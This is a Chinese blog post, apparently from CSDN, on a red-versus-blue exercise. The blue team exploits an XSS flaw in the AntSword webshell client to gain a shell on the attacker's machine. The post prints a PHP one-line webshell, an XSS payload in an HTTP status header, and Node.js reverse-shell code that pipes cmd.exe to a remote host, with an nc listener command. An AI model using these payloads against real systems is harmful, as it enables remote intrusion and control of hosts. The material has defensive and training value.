溯源反制-工具反制-蚁剑反制篇

最新推荐文章于 2024-08-03 21:23:25 发布
最新推荐文章于 2024-08-03 21:23:25 发布
阅读量281 收藏 2
点赞数
分类专栏: 溯源反制 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130368273
版权
文章描述了一场网络安全的模拟对抗,红队上传了一句话PHP木马,而蓝队通过修改webshell内容并使用Nodejs建立socket连接来反制,实现了对红队权限的获取,即使红队退出,蓝队的连接也不会断开,从而控制了主机权限。
摘要由CSDN通过智能技术生成

红队:
上传一句话木马<?php eval($_POST['cmd']);?>
蓝队:
修改红队上传的webshell内容,改为:
<?php
header('HTTP/1.1 500 <img src=# οnerrοr=alert(1)>');
红队点击添加的URL,就会出现弹窗


以下为蓝队操作:
上线:
Nodejs代码:
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(7777, "ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
编码组合后:


header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`dm......==`,`base64`).toString())'>");

 

保存

测试

nc监听 nc -lvvp 7777
注意:监听端口也得添加在安全组,否则像我一样跟无头苍蝇似的到处问为什么我的蚁剑和阿里服务器建立不了socket连接/(ㄒoㄒ)/~~
红队:蚁剑点击,但是报错
蓝队:同时nc回连,并且拿到的权限是主机权限,因为是建立的socket连接,所以即便红队退出蚁剑,蓝队也不会断开 
最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限(主机权限)
参考链接:
朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap等安全工具_sqlmap反制_My Year 2019的博客-CSDN博客

加油上分版
关注
专栏目录
关于反制深入的分析和利用的一点小思路
m0_67105288的博客
02-21 793
前言 前几天我在公众号看到了一名为《端内钓鱼,反制》的文章,我觉得这个思路很好,之后决定深入研究一下,通过两天的研究,现在已经写出了比较真实的反制马。在研究的过程中把一些经验分享出来,希望可以给大家解决一下问题。 一、反制思路 首先我们知道虚拟终端遇到http/https协议头时会发生转换,这个链接打开的页面是以内部的浏览器打开的,在实现上用了node.js,之后通过打开的页面嵌入js来直接执行命令 这里松鼠A师傅的文章说的很明白了,https://mp.weixin.qq.com
2021HW参考 _ 溯源反制终极手册(精选版).pdf
03-30
适合于2021参加hw的人。
反制技术
学生
06-27 383
最后将123.php文件中的内容替换为shell.php文件中的内容。将下面代码中的payload替换为上面的base64字符串。当红队人员退出重新进入webshell后 连接不上 会报错。kali当做攻击队vps 192.168.127.128。此时 攻击队使用(
溯源反制反制攻击者-低版本
最新发布
qq_39972370的博客
08-03 652
低版本中国存在 XSS 漏洞,该漏洞是因为在 webshell 远程连接失败时,中国会返回错误信息,但因为使用的是 html 解析,导致 xss 漏洞。 所以可以在防守方部署网站,诱导攻击方上传木马文件,攻击方使用连接。防守方对木马文件进行更改,利用 nc工具获取到攻击方的shell权限。
关于(AntSword)的溯源反制
Welcome To Myon'Blog !
12-30 1172
如果攻击者再次连接或者进入shell,则会报错,并且反弹一个shell给我们在1971端口上,我们可以利用该shell执行命令等,甚至溯源到对方的外网ip。如果我们发现了这个shell,我们该如何反击呢?以物理机为攻击机,虚拟机kali模拟受害者,之后使用kali进行溯源反制。最开始以为是系统问题,于是全换成Windows系统测试,依旧未成功。启用kali的Apache服务,用于模拟一个对外开放的服务。(我不清楚是否是我版本的问题还是什么问题)我这里使用的版本是2.1.15的(
低版本反制
m0_46317063的博客
11-27 626
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
中国AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
Jiuchen的博客
03-16 3549
中国(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web服务上植入了WebShell,利用去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来在2023年3月16号读到的我这文章,你抱着试试看的态度去尝试了一下,发现
2021HW溯源反制终极手册.zip
04-27
溯源反制思想; 威慑反制能力建设; 红蓝对抗中的溯源反制实战; 溯源反制战术讲解; APT攻击检测与反制技术体系; 溯源反制中常见技术; 红蓝对抗中的溯源反制实战案例讲解; 溯源反制产品; 蜜罐诱捕市场指南; ...
HW多人运动溯源反制指北1
08-03
《HW多人运动溯源反制策略指南》 在网络安全领域,特别是面对高级持续性威胁(APT)时,"HW多人运动"是一种复杂的攻击模式,需要具备专业知识的反制团队进行有效的应对。本文将从反制团队的构建、技术层面的反制...
红蓝对抗中的溯源反制实战.pdf
03-12
红蓝对抗中的溯源反制实战.pdf
应急响应-战中反制&对抗上线CS&Goby&&Sqlmap等安全工具
siu~
04-11 821
知识点 战中-反制-安全工具 CS反制(有版本限制) Goby反制(有版本限制,新版goby已修复) Antsword反制(有版本限制,别人也不一定用) AWVS反制(有版本限制,在awvs 10版本存在) BURP反制(有版本限制,在2020以下版本存在) SQLMAP反制(对于老手而言有点难,特征较为明显) XSS钓鱼 蜜罐反制
溯源(七)之利用AntSword RCE进行溯源反制黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 1334
在之前文章中我们学习了如何通过Web日志,系统日志,安全设备去获取攻击源,然后再通过获取的攻击源的信息再去寻找攻击者的身份,这些方式都是被动的去寻找攻击者的身份 但这些方法不是万能的,实际入侵中,攻击者都会挂一个代理,或者是对自己的流量进行一个加密,所以如果攻击者在攻击过程中进行了以上的行为,那我们通过Web日志或者安全设备得到的攻击源很大概率上都不是真实的 所以,我们要化被动为主动,去主动获取攻击者的身份,主动去寻找攻击者是一个什么样的思路呢?
7、应急响应-战中溯源反制&对抗上线&&CS&Goby&Sqlmap等安全工具
m0_65842464的博客
01-29 2775
黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试,同时也会利用Web应用漏洞上传后门来上线肉机,用到工具例如:,CS等,那么作为蓝队应急人员,就可以针对这些行为采取反制手段。命令管道符:ping "`dir`" , linux系统执行该命令时,管道符中的字符串被当作命令执行。原理:蓝队在红队攻击目标上写一个特殊文件,红队用goby扫描分析时会触发反制被蓝队拿到机器权限。同样以上命令在红队攻击机执行时,参数b管道符中的字符串会被当做命令执行。
【应急响应】战中溯源反制&对抗上线CS&Goby&&Sqlmap等安全工具
今天是几号的博客
04-20 1925
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
WebShell --中国,黑客之
Kevin's Blog
05-07 7736
文章目录一、介绍二、下载安装三、使用3.1 管理Webshell 声明:请于合法授权环境下进行使用,请勿用于非法操作! 一、介绍   开源、跨平台网站管理工具(WebShell管理工具)   中文手册 Github地址: 二、下载安装 在V2版本后安装使用加载器方式进行安装 加载器:https://github.com/AntSwordProject/AntSword-Loader 源码:h...
Webshell溯源排査与反制
2301_76786857的博客
03-15 595
溯源排查中比较重要的一环是web突破口排查,攻击者通过web突破口入侵时,有极大的概率会写入webshell
朔源反制-170-对抗上线CS,Goby,,Sqlmap等安全工具
wuqingsix的博客
02-17 465
python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg。1、蓝队修改EXP里面的执行命令后编译,红队客户端所触发的东西在这里修改:如上线cs。步骤为:修改:EvilJar/src/main/java/Exploit.java。构造一个页面 在含有注入点的时候,其中数据包含有反制的数据包:步骤为。xx为监听的端口号 xx.xx.xx.xx为监听主机。
利用蜜罐怎么进行溯源反制
07-14
利用蜜罐进行溯源反制是一种追踪攻击者并采取相应措施的方法。以下是一些常见的步骤和技术: 1. 日志记录:蜜罐系统应该详细记录所有与其交互的攻击行为,包括攻击者的IP地址、使用的工具和技术、攻击流量等。这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值